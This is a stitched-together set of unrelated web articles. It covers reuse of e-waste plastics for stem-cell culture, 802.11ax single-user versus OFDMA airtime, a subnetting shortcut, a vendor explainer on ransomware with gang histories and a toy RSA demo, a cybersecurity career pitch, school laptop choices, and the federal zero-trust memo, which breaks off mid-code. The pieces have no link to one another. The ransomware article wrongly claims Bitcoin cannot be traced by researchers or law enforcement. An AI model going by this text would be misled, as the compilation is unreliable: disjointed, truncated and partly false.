Plastics found in electronic waste (e-waste) are rarely recycled due to their complex composition and hazardous additives, but scientists at Nanyang Technological University, Singapore (NTU Singapore) have developed a new use for them: repurposing them as an alternative to the plastics used in laboratory cell culture containers, such as Petri dishes. Scientists at the NTU Singapore-CEA Alliance for Research in Circular Economy (SCARCE) repurposed the e-waste plastics, subjecting them only to sterilization before trialing them in lab experiments. The team found that over 95 percent of the human stem cells seeded on plastics scavenged from discarded computer components remained healthy after a week, a result comparable to cells grown on conventional cell culture plates. These findings, described in a study published online in the scientific journal Science of the Total Environment, indicate a potential new sustainable use for e-waste plastics, which account for about 20 percent of the 50 million tonnes of e-waste produced worldwide each year.
The new findings build on a 2020 study led by the same NTU team, which investigated the effect of e-waste plastics on six different human cell types and found healthy cell growth despite the hazardous elements to be found in e-waste plastics. These findings inspired the research team to upcycle e-waste plastic scraps and trial them in advanced cell culture applications.
Professor Dalton Tay of the NTU School of Materials Science and Engineering and School of Biological Sciences, who led this interdisciplinary study, said: "E-waste plastics contain hazardous components which may get released into the environment if not disposed of properly. Interestingly, we found through our studies that certain e-waste plastics could successfully maintain cell growth, making them potential alternatives to the cell culture plastics used in labs today."
"Repurposing them for immediate use rather than recycling them enables the immediate extension of the lifespan of e-waste plastics and minimizes environmental pollution. Our approach is in line with the zero-waste hierarchy framework, which prioritizes the reuse option through materials science and engineering innovation."
The NTU team used plastic scavenged from e-waste collected by a local waste recycling facility. Three kinds of e-waste plastic were chosen for their varied surface features -- the keyboard pushbuttons and diffuser sheet obtained from LCDs have a relatively flat and smooth surface, while the prism sheet, also found in LCDs, has highly aligned ridges. To test the viability of using e-waste plastics for cell cultures, the NTU team seeded stem cells onto 1.1cm-wide circular discs of sterilized e-waste plastics. A week later, the scientists found that more than 95 percent of live and healthy stem cells seeded on the e-plastics remained -- a result comparable to the experimental control of stem cells grown on commercially available cell culture plates made of polystyrene.
Prof Tay said: "In tissue engineering, we use advanced techniques to engineer surfaces and study how they can influence stem cell differentiation. Now, we have shown that e-waste plastics is a ready source of such microstructures that allow us to further study how stem cell development can be directed -- the 'holy grail' of regenerative medicine and more recently, lab-grown meat. There are important biomaterials and scaffold design rules and lessons we can learn from these e-waste plastic scraps."
The scientists say their approach promotes sustainable practices in research and innovative waste-to-resource solutions for industry. The research is supported by Singapore's National Research Foundation and the National Environment Agency, under the Closing the Waste Loop Funding Initiative.
The 802.11ax amendment was built to increase the efficiency of WiFi. One of the new features is OFDMA or the capability to send data to several stations simultaneously, multi-user operations.
One of the benefits of OFDMA is that it decreases the time it takes to send data to several stations compared with single-user operations, especially for smaller frame sizes. But for which frame sizes, exactly?
In this blog, I will check the trade-off between SU and MU operations in 802.11ax for three typical scenarios.
You will be amazed; I was.
TXOP durations, SU and MU
Let us pretend the AP receives data from the infrastructure that shall be sent to two wireless clients, the same data to both. Because of contention on the wireless channel, the data is temporarily stored in the AP's buffer. When the channel becomes free, the AP will send the data.
In this blog, I will try to find out whether MU or SU operations take the least time to send the data to those two clients.
If we look at the TXOP durations for this it will look like this:
The first diagram shows the duration of the transmission using single-user HE frame format for the data frame. The AP needs to send two TXOPs for transferring the data to both clients.
The second diagram shows the same data sent to both clients using multi-user OFDMA operations. This time the AP sends the data to both clients simultaneously in one TXOP.
Common to both operations is that the TXOPs use AIFS[BE], CW = 8, and MCS7 for the data field. Each TXOP in figure 1 sends one symbol of data.
If you look closer at the duration of each part of the TXOP, you will see a difference in the HE preamble and the Block Acknowledgement (B-Ack). I explain this later.
The SU TXOP
Let’s look at the SU TXOP. Another view is like this:
When the AP decides to send the data to the clients with SU operation, it will send the data frame in the HE SU frame format, and the BlockAck from the clients is sent in the legacy 802.11a frame format. The details of the HE SU frame format are briefly described in figure 2.
The duration for each part of TXOP can be found in the WiFiAirTimeCalculator
Without any further explanation, the duration of two TXOPs is:
t(2 x TXOPsu) = 2 * (43 + 72 + 20 + 22.2 + duration of data field + 16 + 44) [microseconds], or
2 * (217.2 + duration of the data field).
Remark: the BlockAck is sent at 12 Mb/s.
In figure 1 there is one symbol of data in each TXOP. One symbol is 14.4 microseconds including the medium guard interval (1.6 µs), so the shortest possible time for sending two TXOPs with SU operation is approximately 460 microseconds.
This can and will vary slightly depending on the number of spatial streams and other factors.
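The arithmetic above can be captured in a few lines. This is a sketch using only the per-field durations assumed in this scenario (AIFS[BE] = 43 µs, CW = 72 µs, and so on); the function and constant names are mine, not from the post or any calculator:

```python
# Fixed per-TXOP overheads for this scenario (microseconds):
AIFS_BE = 43          # AIFS[BE]
CW = 72               # random backoff, CW = 8
L_PREAMBLE = 20       # legacy preamble
HE_SU_PREAMBLE = 22.2
SIFS = 16
LEGACY_BA = 44        # BlockAck sent at 12 Mb/s

SYMBOL_US = 14.4      # one HE symbol incl. the 1.6 us guard interval

def su_txop(data_symbols: int) -> float:
    """Duration of a single HE SU TXOP carrying `data_symbols` symbols."""
    overhead = AIFS_BE + CW + L_PREAMBLE + HE_SU_PREAMBLE + SIFS + LEGACY_BA
    return overhead + data_symbols * SYMBOL_US

# Two single-user TXOPs, one data symbol each:
print(2 * su_txop(1))  # ≈ 463.2 us, i.e. roughly 460 us
```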
The DL MU TXOP
An 802.11ax downlink multi-user TXOP looks like this:
When the AP decides to send data to the clients with MU operations, it will use the HE MU frame format. With this frame format, it subdivides the channel into resource units and sends the data to the clients in parallel. The information on how the channel is subdivided is carried in the HE preamble, in the HE-SIG-B subfield. This is the reason why the HE preamble has a longer duration during MU operation.
The other key difference from SU operations is that each receiving client/station sends its BlockAcknowledgement (BA) uplink to the AP in the HE trigger-based frame format. Because this is an HE frame format, it needs the same HE preamble as other HE frame formats. That is why transmitting a BA in HE takes longer than a BA in a legacy frame format; however, several BAs are now sent simultaneously.
A typical DL MU OFDMA TXOP (without RTD/CTS) seen in Wireshark looks like this:
- The first line in figure 4 is the Basic Trigger sub-A-MPDU, where the AP informs the client how it shall send its BlockAck
- 11 sub A-MPDU data frames
- The last line is the BlockAck from the client, in a HE trigger-based frame format
Remark: the capturing device is configured to capture traffic for this specific client/station
The total duration t(mu) = duration of AIFSN[BE] + duration of CW (random backoff timer ) + duration of legacy preamble + duration of HE MU preamble + duration of MU data field + SIFS + duration of legacy preamble + duration of HE trigger-based preamble + duration of the data field for the BA
The last part (SIFS + Multi-STA BA) can be calculated manually, but I will use data from figure 4. The easiest place to look is the Duration/NAV field of the preceding data frame. In this blog, I use a NAV of 130 microseconds.
Alternatively, look at the UL Length field of the Basic Trigger frame in the DL data frame. For this, you need to do some calculation.
That is: UL Length * 4/3 + SIFS + legacy preamble, or (70 * 4/3 + 16 + 20 = 129.3)
With this setup (two clients and MCS0 for the HE-SIG-B), the HE-SIG-B needs three symbols.
Without further discussion or explanation, the duration of a DL MU TXOP is:
t(mu) = 43 + 72 + 20 + 33.2 + duration of data field + 130 [microseconds], or
t(mu) = 298.2 + duration of the DL data field
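The same kind of sketch works for the MU case. The 130 µs tail (SIFS plus the HE trigger-based Multi-STA BlockAck) is taken from the author's capture, and the names below are mine:

```python
# Per-TXOP overheads for the DL MU OFDMA scenario (microseconds):
MU_OVERHEAD = 43 + 72 + 20 + 33.2   # AIFS[BE] + CW + legacy preamble + HE MU preamble
MU_BA_PART = 130                    # SIFS + HE trigger-based Multi-STA BA (from capture)
SYMBOL_US = 14.4                    # one HE symbol incl. 1.6 us guard interval

def mu_txop(data_symbols: int) -> float:
    """Duration of one DL MU OFDMA TXOP serving both clients at once."""
    return MU_OVERHEAD + data_symbols * SYMBOL_US + MU_BA_PART

# Cross-check of the BA tail from the Basic Trigger's UL Length field:
# 70 * 4 / 3 + SIFS (16) + legacy preamble (20) ≈ 129.3 us
print(mu_txop(1))  # ≈ 312.6 us, i.e. roughly 312 us
```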
Different use of subcarriers in HE SU and MU operations
The use of subcarriers differs between SU and MU operations. On a 20 MHz channel, the transmitter uses the full channel during single-user operations: 242 subcarriers, of which 234 transfer data and the remaining 8 are pilot subcarriers.
During multi-user operations, subdividing the channel for two clients, the AP assigns 106 subcarriers to each client, of which 102 transfer data and 4 are pilots. In addition, the center 26-tone resource unit (26 subcarriers) is not used.
Comparing SU and MU operations
In figure 1 we saw that sending two TXOPs in single-user operation took 460 microseconds, while the same data sent in one TXOP with multi-user operation took 312 microseconds. Both methods send one symbol of data.
Because single-user operation uses more of the spectrum (more data subcarriers) than multi-user operation, the duration of the MU TXOP increases faster than the duration of the single-user TXOPs as the data payload grows.
Why: SU uses 234 data subcarriers on a 20 MHz channel. When the same 20 MHz channel is subdivided into two 106-tone RUs, only 102 subcarriers are used for data to each client. 102 in relation to 234 is 44%.
Therefore the durations of the two operations get closer for bigger payloads and at some point become equal.
We will look at three scenarios. Common to all of them is that the data is sent with MCS7, AIFS[BE], and a CW of 8. The SU BlockAck is sent at 12 Mb/s. The duration for the MU BlockAck is taken from a capture.
No protection (RTS/CTS) is used. With it, the result would have been slightly different, especially when using the MU-RTS frame during MU operations, but not by much.
In the following figures, the payload in bytes is on the x-axis and the duration in microseconds is on the y-axis.
All three start with a duration of 312 microseconds for the MU TXOP and 460 microseconds for the two SU TXOPs. The circle marks approximately where the two lines cross.
Scenario 1 is with 20MHz, 1 spatial stream
Scenario 2 is with 20 MHz and 2 spatial streams
Scenario 3 is with 80 MHz and 2 spatial streams which will be a very common scenario in WiFi6E, WiFi in the 6 GHz band.
As we can see, the AP has to send rather big frames before the duration of the MU TXOP exceeds the duration of the two SU TXOPs.
At 20 MHz and 1 spatial stream, the breaking point is approximately 5,000 bytes (5 kB)
At 20 MHz and 2 spatial streams, the breaking point is approximately 10,000 bytes (10 kB)
At 80 MHz and 2 spatial streams, the breaking point is approximately 120,000 bytes (120 kB)
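The first breaking point can be reproduced with a rough model. Assuming MCS7 (64-QAM, rate 5/6) carries 5 data bits per data subcarrier per symbol per stream, and ignoring A-MPDU padding and other per-frame overheads, a sketch like the following lands near the ~5 kB crossover for scenario 1 (all names and the step size are my own choices):

```python
import math

SYMBOL_US = 14.4         # HE symbol incl. 1.6 us guard interval
BITS_PER_SC = 5          # MCS7: 64-QAM, rate 5/6 -> 5 data bits per subcarrier
SU_OVERHEAD = 217.2      # per SU TXOP, excluding the data field (us)
MU_OVERHEAD = 298.2      # per MU TXOP, excluding the data field (us)

def su_duration(payload_bytes, data_sc=234, streams=1):
    """Two SU TXOPs, one per client, full-channel data field."""
    bits_per_sym = data_sc * BITS_PER_SC * streams
    syms = math.ceil(payload_bytes * 8 / bits_per_sym)
    return 2 * (SU_OVERHEAD + syms * SYMBOL_US)

def mu_duration(payload_bytes, ru_sc=102, streams=1):
    """One MU TXOP serving both clients on 106-tone RUs."""
    bits_per_sym = ru_sc * BITS_PER_SC * streams
    syms = math.ceil(payload_bytes * 8 / bits_per_sym)
    return MU_OVERHEAD + syms * SYMBOL_US

# Smallest per-client payload (in 100-byte steps) where SU beats MU:
payload = next(b for b in range(100, 20000, 100)
               if su_duration(b) < mu_duration(b))
print(payload)  # 4800 -> breaking point around 5 kB at 20 MHz, 1 stream
```

The exact value wiggles with the symbol rounding, but the trend matches the figures: the narrower RU pays roughly 2.3x more airtime per data bit, so the MU line eventually overtakes the two SU TXOPs.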
In this blog, I have compared the time it takes to send data from an AP to two clients using HE (802.11ax) single-user and multi-user operations. For small frame sizes, multi-user operation has the shortest duration. Depending on whether the data is sent over 20 or 80 MHz, and with 1 or 2 spatial streams, the breaking point where single-user operation becomes shorter than multi-user operation varies.
For me, it was surprising how big the payloads need to be before single-user operation becomes more efficient than multi-user operation.
But this is only one scenario out of an endless number of scenarios. This one sent the same amount of data to two clients at the same MCS and AIFS[n].
I hope this is as useful for you as it was for me.
Speed Subnetting, Part 2
Click here for Part 1 of this series.
WARNING: You must master subnetting using our course or some other trusted materials before you start using these shortcut approaches. It is a common issue for Cisco candidates to move directly to subnetting shortcuts for the exams without fully understanding exactly how subnetting functions.
Question 2: You have run the ipconfig command and discovered your IP address and mask are 192.168.20.102 and 255.255.255.224. How many hosts are permitted on your subnet?
Step 1: I reference the Powers of Two chart I created on my scratch paper when I encountered the first question. Adding 128 + 64 + 32 = 224. There are 3 bits used for subnetting and that leaves 5 bits for hosts.
2^7=128 | 2^6=64 | 2^5=32 | 2^4=16 | 2^3=8 | 2^2=4 | 2^1=2 | 2^0=1
Step 2: The equation for the number of hosts per subnet is 2^h - 2, where h is the number of host bits. From the chart I see that 2^5 = 32, and 32 - 2 = 30 hosts per subnet. Too easy!
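If you want to double-check a result away from the exam room, Python's standard library can confirm the by-hand math. This is a sanity check, not an exam technique:

```python
import ipaddress

# Let the standard library confirm the by-hand subnetting:
net = ipaddress.ip_network("192.168.20.102/255.255.255.224", strict=False)
host_bits = 32 - net.prefixlen          # /27 leaves 5 host bits
usable_hosts = 2 ** host_bits - 2       # minus network and broadcast addresses
print(net, host_bits, usable_hosts)     # 192.168.20.96/27 5 30
```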
As always, let us know in the comments if you have a quicker approach.
Ransomware Explained. What It Is and How It Works
This post is also available in: German
Every day, cybersecurity specialists detect over 200,000 new ransomware strains. This means that each minute brings no less than 140 strains capable of avoiding detection and inflicting irreparable damage. But what is ransomware in the end? Briefly, ransomware is one of the most common and most dangerous cyber threats of today, with damaging consequences for individuals and businesses alike.
In this article, I will explain what ransomware is, how it works, how to prevent it, and what to do if attacked. Besides, recent statistics and ransomware examples will show you real facts to make you understand how ransomware attacks really happen.
What Is Ransomware?
Ransomware is a type of malware that blocks users from accessing their operating system or files until a ransom is paid. It does so by locking the system’s screen or encrypting the users’ files.
The victims receive a ransom note informing them that they must pay a certain amount of money (usually in Cryptocurrencies) to regain access to their system or data. There is generally a time restriction for completing the payment, else the files may be lost permanently or made public by attackers. It should be reminded that even if the victim pays the ransom, there is no assurance that the decryption key will be delivered.
How Does Ransomware Work?
Every ransomware strain behaves differently. There are two main types of ransomware: locker ransomware and encrypting ransomware. The first locks the victim out of the operating system, making it impossible to access the desktop and any apps or files; the latter is the most common and incorporates advanced encryption algorithms designed to block access to files.
However, the result is always the same: locked files or systems and a ransom demanded for their recovery. Here are the common steps in how ransomware works:
1. Ransomware Delivery and Deployment
Cybercriminals simply look for the easiest way to infect a system or network and use that backdoor to spread the malicious content. Nevertheless, these are the most common infection methods used by cybercriminals:
- Phishing email campaigns that contain malicious links or attachments (there are plenty of forms that malware can use for disguise on the web);
- Security exploits in vulnerable software;
- Internet traffic redirects to malicious websites;
- Legitimate websites that have malicious code injected into their web pages;
- Drive-by downloads;
- Malvertising campaigns;
- SMS messages (when targeting mobile devices);
- vulnerable Remote Desktop Protocol exploitation.
2. Lateral Movement
After the initial access, ransomware spreads via lateral movement tactics to all devices in your network and tries to get full access. If no micro-segmentation or network segmentation is in place, the ransomware will move laterally on the network, meaning that the threat spreads to other endpoints and servers in the entire IT environment, thereby engaging in self-propagation. Along the way, attackers can use detection-evasion techniques to build persistent ransomware attacks.
3. Attack Execution
Where ransomware once relied on tactics like weak symmetric encryption, operators now leverage more advanced methods like data exfiltration. Hackers can exfiltrate sensitive business data before encrypting it, leading to double extortion: cybercriminals can threaten organizations with making their private information public if the ransom is not paid. Keeping data hostage is no longer the only method.
Ransomware will look for backups in order to destroy them before encrypting data. This type of malware can recognize backups by file extension and documents stored in the cloud could be at risk too. Offline backup storage or read-only features on backup files might prevent backups recognition and deletion.
Ransomware is practically the combination of cryptography with malware. Ransomware operators use asymmetric encryption, a.k.a. public-key cryptography, a process that employs a pair of keys (one public and one private) to encrypt and decrypt a file and protect it from unauthorized access or use. The keys are uniquely generated for the victim, and the private key is only made available after the ransom is paid.
It is almost impossible to decrypt the files that are being held for ransom without access to a private key. However, certain types of ransomware can be decrypted using specific ransomware decryptors.
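The public-key mechanism described above can be illustrated with a deliberately tiny, insecure textbook RSA example. Real attackers use hardened libraries and keys of 2048 bits or more; the toy primes and numbers below are for understanding only, and the idea of the "message" standing in for a per-victim symmetric key is the hybrid scheme described above:

```python
# Textbook RSA with toy primes -- for illustration only, never for real use.
p, q = 61, 53
n = p * q                 # public modulus (3233)
phi = (p - 1) * (q - 1)   # 3120
e = 17                    # public exponent; (n, e) is the public key
d = pow(e, -1, phi)       # private exponent; only the key holder knows d

message = 42              # stands in for a per-victim symmetric file key
ciphertext = pow(message, e, n)      # anyone can encrypt with the public key
recovered = pow(ciphertext, d, n)    # only the private key decrypts

print(ciphertext, recovered)  # 2557 42
```

This is why paying attackers for the private key is the only mathematical route to the data once files are encrypted, and why backups and decryptors released by researchers matter so much.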
After encryption, a warning pops up on the screen with instructions on how to pay for the decryption key. Everything happens in just a few seconds, so victims are completely dumbstruck as they stare at the ransom note in disbelief.
The appearance of Bitcoin and the evolution of encryption algorithms helped turn ransomware from a minor threat used in cyber vandalism, to a full-fledged money-making machine. Usually, threat actors request payment in Bitcoins because this cryptocurrency cannot be tracked by cybersecurity researchers or law enforcement agencies.
Top Targets for Ransomware
Cybercriminals soon realized that companies and organizations were far more profitable than individual users, so they went after the bigger targets: police departments, city councils, and even schools and hospitals. The percentage of businesses that paid the ransom rose from 26% in 2020 to 32% in 2021, and $170,404 is the average value of the ransom paid this year. But for now, let's find out what the top targets for ransomware are.
Public institutions, such as government agencies, manage huge databases of personal and confidential information that cybercriminals can sell, making them favorites among ransomware operators. Because staff are not trained to spot and avoid cyberattacks, and because public institutions often use outdated software and equipment, their computer systems are packed with security holes just begging to be exploited.
Unfortunately, a successful infection has a big impact on conducting usual activities, causing huge disruptions. Under such circumstances, ransomware victims experience financial damage either by owning up to large ransomware payouts or by bearing the price of recovering from these attacks.
In short, because that’s where the money is. Threat actors know that a successful infection can cause major business disruptions, which will increase their chances of getting paid. Since computer systems in companies are often complex and prone to vulnerabilities, they can easily be exploited through technical means. Additionally, the human factor is still a huge liability that can also be exploited through social engineering tactics. It is worth mentioning that ransomware can affect not only computers but also servers and cloud-based file-sharing systems, going deep into a business’s core.
Cybercriminals know that businesses would rather not report an infection for fear of legal consequences and brand damage.
Since they usually don’t have data backups, home users are the number one target for ransomware operators. They have little or no cybersecurity education at all, which means they’ll click on almost anything, making them prone to manipulation by cyber attackers. They also fail to invest in need-to-have cybersecurity solutions and don’t keep their software up to date (even if specialists always nag them to). Lastly, due to the sheer volume of Internet users that can become potential victims, more infected PCs mean more money for ransomware gangs.
By now you know that there’s plenty of versions out there. With names such as CryptXXX, Troldesh, or Chimera, these strains sound like the stuff hacker movies are made of. So while newcomers may want to get a share of the cash, a handful of families have established their domination.
Conti ransomware has become famous after targeting healthcare institutions. Its usual methods leverage phishing attacks to achieve remote access to a machine and further spread laterally onto the network, meanwhile performing credentials theft and unencrypted data gathering.
A famous attack was that on Ireland’s Health Service Executive (HSE) on the 14th of May 2021 when the gang requested $20 million not to release the exfiltrated data.
DarkSide is a ransomware program that operates as a ransomware-as-a-service (RaaS) group. It began attacking organizations worldwide in August 2020 and, like other similar threats utilized in targeted cyberattacks, DarkSide not only encrypts the victim’s data but also exfiltrates it from the impacted servers.
In just 9 months of operations, at least $90 million in Bitcoin ransom payments were made to DarkSide, coming from 47 different wallets. The ransomware gang gained around $10 million from that profit attacking chemical distribution organization Brenntag, which paid a $4.4 million ransom, and Colonial Pipeline, which also paid $5 million in cryptocurrency.
It’s a good example of ransomware that uses double extortion as hackers normally ask for a ransom to return the data they exfiltrated, so the paying pressure is higher.
REvil ransomware, a.k.a. Sodinokibi, first spotted in April 2019 and operating on a ransomware-as-a-service model, is famous for its attacks on JBS in June 2021 and Kaseya in July 2021.
Due to a SQL injection vulnerability in Kaseya's software, REvil managed to encrypt Kaseya's servers. This resulted in a supply chain attack, as Kaseya's customers were infected in turn.
JBS, the biggest meatpacking enterprise worldwide, was hit by REvil on May 30, 2021, and had to pay an $11 million ransom to prevent hackers from leaking their data online.
Avaddon Ransomware was distributed via phishing emails with malicious JAVA script files and is famous for its attack on the French enterprise AXA in May 2021. Its operators use normally data leak websites to publish there the information of the victims who do not pay the ransom.
As its name suggests, QLocker ransomware operates as a locker, compromising users' storage devices; victims are locked out until they provide a password. Its targets are QNAP network-attached storage devices, where files are encrypted into password-protected 7-zip archives.
Ryuk is a ransomware-as-a-service (RaaS) group that’s been active since August 2018. It is widely known for running a private affiliate program in which affiliates can submit applications and resumes to apply for membership. In the last months of 2020, the gang’s affiliates were attacking approximately 20 companies every week, and, starting November 2020, they coordinated a massive wave of attacks on the US healthcare system.
Even if this one is not recent, we cannot skip mentioning it. On Friday, May 12, 2017, around 11 AM ET/3 PM GMT, WannaCry, a ransomware attack of an “unprecedented level” (Europol), started spreading around the world. It used a vulnerability in Windows that allowed it to infect victims' PCs without them taking any action. By May 24, 2017, the infection had affected over 200,000 victims in 150 countries.
From the first ransomware in 1989, distributed via floppy disks with a ransom price of $189, to today's multi-million-dollar ransoms, here are some statistics that will help you further understand the threat of ransomware.
- The first half of 2021 recorded a doubling in ransomware attacks compared to 2020.
- Data exfiltration and data leakage were common practices that allowed double extortion.
- Conti, Avaddon, and REvil are the authors of 60% of the attacks.
- The U.S. registered 54.9 % of the victims, being a top target for ransomware attacks.
Top Ransomware Targets by Industry
According to SonicWall's 2021 Cyber Threat Report, there have been far more hits on government customers than on any other industry. By June, government customers "were getting hit with roughly 10 times more ransomware attempts than average".
During the first half of 2021, the education field saw even more ransomware attempts than the government sector. In March, the FBI's Cyber Division issued a flash alert to warn of an increase in ransomware attacks targeting government entities, educational institutions, private companies, and the healthcare sector. A month later, the Conti ransomware gang encrypted the systems at Broward County Public Schools, threatening to release sensitive personal data of students and staff unless the district paid an enormous $40 million ransom.
Healthcare organizations are the new favorite targets of ransomware attacks. Hospitals have become perennial targets of cyberattacks, including UC San Diego Health, Scripps Health, SalusCare, New Hampshire Hospital, and Atascadero State Hospital. Healthcare providers lose an average of 7% of their customers after a data breach or ransomware attack, the highest rate of any industry.
Ransomware operators seem to often target retail enterprises because “they are rarely secured well and the benefits are easily monetized.” SonicWall security specialists discovered startling ransomware spikes across retail entities (264%). In July, the Coop Supermarket chain had to close 500 of its stores following the Kaseya ransomware attack.
Ransomware brought extortion to a global scale, and it’s up to all of us, users, business owners, and decision-makers, to disrupt it.
We now know that:
- creating malware or ransomware threats is now a business and it should be treated as such;
- the “lonely hacker in the basement” stereotype died a long time ago;
- the present threat landscape is dominated by well-defined and well-funded groups that employ advanced technical tools and social engineering skills to access computer systems and networks;
- what's more, cybercriminal groups are hired by large states to target not only financial objectives but also political and strategic interests.
We also know that we’re not powerless and there’s a handful of simple things we can do to avoid ransomware. Cybercriminals have as much impact on your data and your security as you give them.
Check this article for more information on how to prevent ransomware.
Heimdal™ Ransomware Encryption Protection
- Blocks any unauthorized encryption attempts;
- Detects ransomware regardless of signature;
- Universal compatibility with any cybersecurity solution;
- Full audit trail with stunning graphics;
By, Guest Contributor: Akshatha Kamath
There was a time when a career in IT was limited to mainframe computers and network support. IT professionals were charged with ensuring technology worked correctly within their organizations so employees could get their jobs done without glitches. Those days seem like ancient history now, as the field of IT has grown to include countless tasks and roles.
Protecting enterprise data and infrastructure has become one of the most critical roles of IT thanks to the rise of cyber attacks. We transmit vast quantities of sensitive data digitally as transactions are made, and we store even more, creating veritable gold mines for hackers who want to steal valuable information, commit denial-of-service attacks, or simply create havoc.
The need for people with cyber security skills is far outpacing the number of qualified applicants, making this a career choice worth considering.
Cyber Security As the New Frontier in IT
Although it has one primary goal—protecting networks, computers, programs, and data from attack, damage and unauthorized access—this field is made up of technologies, processes and practices working together. It is sometimes referred to as information technology security, or IT security because the IT department owns the task of protection and defense.
Cyber security is needed in every domain, from the government to corporate, military to medical, financial to personal, because each one collects, stores and transmits data, much of which is sensitive information. Think back to the Equifax data breach and you’ll realize how far-reaching the effects of a cyber attack can be—the personal information of almost half the population of the United States was compromised during that attack.
As the amount of digital data and transactions grow, so does the need for cyber security professionals in a variety of roles. This has opened the doors to a lucrative career move for both seasoned IT professionals and those making a lateral career move into a new field.
If you’re considering a cyber security certification to either advance or change your career, there are many compelling reasons to do so, including a strong demand in the job market, the pay, the opportunities, and the ease with which you can become qualified.
1. The Demand for Cyber Security Professionals Is Strong
In just the first six months of 2017, there were 918 reported data breaches comprising 1.9 billion data records. That’s 164 percent higher than 2016, and that number does not include data breaches that weren’t reported.
The increase in both data and attacks has created a strong demand for skilled professionals in this domain. It’s predicted that we will need 6 million cyber security professionals by 2019, and we will have 3.5 million unfilled cyber security jobs by 2021. In fact, the number of cyber security jobs is growing three times faster than other tech jobs.
2. It’s a Field of Constant Change
3. Doing Good Work While Making Good Money
4. Seek New Opportunities
5. Easy to Move Into This Field
- The CompTIA certification, which is a good choice if you’re new to the field. With this certification, you can likely get your foot in the door with a tech support job to start with.
- Certified Ethical Hacker (CEH) certification, which will help you master advanced concepts such as corporate espionage, viruses, and reverse engineering.
- The Certified Information Systems Security Professional (CISSP) certification, the gold standard in the field of information security. This certification will train you to become an information assurance professional who defines all aspects of IT security, including architecture, design, management and controls. Most IT security positions require or prefer a CISSP certification.
- The Certified Information Systems Auditor (CISA) certification will teach you the skill sets you’ll need to govern and control the information technology for a business, as well as how to perform an effective security audit on any organization.
Devices School Districts Are Using
The vast majority of the school districts we work with agree that 1:1 computing is ideal – not only because it helps meet Common Core Standards but also because it promotes collaboration, incentivizes engagement and gives students access to curriculum throughout the day and at home for homework. When moving to a 1:1 model, districts are faced with a number of device options. So we thought we’d share with you a few examples of what devices K12 Districts are deploying.
- HP Chromebook14: Visalia Unified School District in California uses the Chromebook in an effort to comply with regulation on conducting standardized testing, but they have since integrated these devices for daily use. The Chromebook is very affordable (D&D can provide the device, Google OS management license and theft-preventing engraving) and works off of the Google cloud, making secure use across multiple apps seamlessly simple.
- Samsung Galaxy Tab 4 Education: The Plainfield Public School District in New Jersey was looking for a device that they could use with Discovery Education and Google. Students in grades 6-12 are using these devices. They come to the students pre-installed with apps (the IT department has blocked student download of applications), electronic textbooks, and internet access. Plainfield is primarily using Google Apps for Education.
- Lenovo ThinkPad Yoga 11e Notebook: When Leander Independent School District in Texas started using the ThinkPad, their goal was to equip their students with technological expertise that would give them greater options upon graduation. This touch-screen device allows students to write directly on the screen. It also works with digital probes, which is great in the science classroom. Leander is using Google Apps for Education and Web 2.0 to create presentations and poll students.
If you would like to talk to an expert about which device could best meet your school’s needs, contact D&D Security by calling 800-453-4195 or by clicking here.
Cybersecurity is one of the pressing issues that the United States is facing. Threats affect the government, organizations, institutions, and even individuals.
The Identity Theft Resource Center (ITRC) said there were 1,291 data breaches publicly reported in the U.S. from January to September 2021, affecting about 281 million individuals. In comparison, this total is 17% more than the recorded breaches during the same period in 2020.
Government Efforts: The Federal Zero Trust Strategy
To address this problem, the government looks for ways to improve cybersecurity. On January 26, 2022, the Federal Zero Trust Strategy was released. The Office of Management and Budget (OMB) published the strategy as Memorandum M-22-09, Moving the U.S. Government Toward Zero Trust Cybersecurity Principles.
This move aims to promote a better security approach through government-wide efforts, setting a new baseline in terms of access controls. An important point to highlight is the prioritization of using phishing-resistant multi-factor authentication (MFA). Additionally, there is also a need to consolidate identity systems for improved protection and monitoring.
Understanding the Strategy
At the core of the strategy are two main focuses — the vision and actions on identity.
Generally, staff members of government agencies have to use enterprise-managed identities to get access to applications used for work. Phishing-resistant multi-factor authentication must be in place to protect said personnel against more sophisticated cyberattacks.
Three actions must be taken.
First, the agencies should have centralized management systems for users.
Second, they should use strong MFA throughout the organization. Specifically, all agency staff members, contractors, and partners have to use phishing-resistant MFA, while public users should be given the option. Furthermore, password policies should not require special characters or regular password rotation.
Third, agencies should consider having at least one device-level signal when giving users authority to access resources. This signal is additional security alongside identity information about the authenticated user.
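The memo’s password guidance mirrors NIST SP 800-63B: check length and screen against known-breached passwords, but drop composition and rotation rules. A minimal sketch of what such a policy check might look like (the breached list here is a stand-in for a real lookup service such as a haveibeenpwned query):

```python
# Sketch of a password policy aligned with the memo's guidance: length
# plus a breached-password screen, with no special-character or rotation
# requirements. BREACHED is an illustrative stand-in for a real service.

BREACHED = {"password", "password123", "123456", "qwerty"}

def is_acceptable(password: str, min_length: int = 8) -> tuple[bool, str]:
    """Return (ok, reason). Note: no composition rules, no expiry check."""
    if len(password) < min_length:
        return False, f"shorter than {min_length} characters"
    if password.lower() in BREACHED:
        return False, "found in breached-password list"
    return True, "ok"

print(is_acceptable("Password123"))                   # rejected: breached
print(is_acceptable("correct horse battery staple"))  # accepted
```

Long passphrases pass, while short or widely compromised passwords fail, which is exactly the trade-off the strategy encourages.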
The FIDO Standard
Through the announcement of the strategy, the federal government also encouraged the use of FIDO2 standards, further recognizing the FIDO Alliance’s efforts to promote phishing-resistant multi-factor authentication and reduce people’s over-reliance on passwords.
The FIDO2 is FIDO Alliance’s newest set of specifications. It includes Web Authentication (WebAuthn) specification and Client-to-Authenticator Protocol (CTAP). Learn more about the FIDO2 Project here.
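The reason FIDO2-style MFA resists phishing is origin binding: the authenticator signs the server’s challenge together with the origin it actually sees, so a response captured on a lookalike domain never verifies. A conceptual sketch of that property (not the real WebAuthn protocol, which uses public-key signatures; this is an HMAC-based simulation):

```python
# Conceptual illustration of origin binding. The "authenticator" signs
# challenge + origin; the server verifies against the origin it expects.
# A response produced on a phishing domain fails verification.
import hmac, hashlib, secrets

credential_key = secrets.token_bytes(32)  # shared key for simplicity only;
                                          # real FIDO2 uses asymmetric keys

def sign_assertion(key: bytes, challenge: bytes, origin: str) -> bytes:
    return hmac.new(key, challenge + origin.encode(), hashlib.sha256).digest()

def verify(key: bytes, challenge: bytes, expected_origin: str,
           assertion: bytes) -> bool:
    good = sign_assertion(key, challenge, expected_origin)
    return hmac.compare_digest(good, assertion)

challenge = secrets.token_bytes(16)
# Legitimate login: the authenticator sees the real origin.
ok = verify(credential_key, challenge, "https://agency.example",
            sign_assertion(credential_key, challenge, "https://agency.example"))
# Phished login: the authenticator saw the attacker's lookalike origin.
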